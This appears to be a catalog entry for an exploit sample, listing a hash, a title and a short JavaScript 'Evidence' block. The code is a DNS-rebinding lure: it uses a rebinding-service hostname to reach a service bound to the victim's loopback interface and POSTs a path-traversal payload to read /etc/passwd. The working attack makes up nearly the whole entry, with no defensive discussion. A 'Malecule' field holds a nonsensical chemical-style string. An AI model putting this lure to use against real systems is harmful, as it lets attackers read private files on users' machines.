46/e7/46e7d8f1ee2935e330baba2b5282466b72b2c85306367e7e7dd11ebf7c41c919
DNS rebinding path traversal exploit
Body traversal targets Unix account databaseDNS rebinding hostname with traversal POST
SHA-25646e7d8f1ee2935e330baba2b5282466b72b2c85306367e7e7dd11ebf7c41c919
MaleculeO(Xe₂)H₃(Cm₆DbF)
Evidence
1// DNS-rebinding lure fragment. The page is served from a rebinding-as-a-service
2// hostname whose first DNS answer is the attacker host and whose second answer
3// is the victim's loopback interface, defeating the browser same-origin check
4// so the follow-up fetch lands on a service bound to 127.0.0.1.
5const REBIND_HOST = "http://7f000001.7f000001.rbndr.us:3001/";
6
7async function probe() {
8 // Push a traversal path into the local service's request body to read files
9 // outside the intended root once the rebind resolves to loopback.
10 await fetch(REBIND_HOST + "files", {
11 method: "POST",
12 body: "target=../../../../../../etc/passwd"
13 });
14}
15
16probe();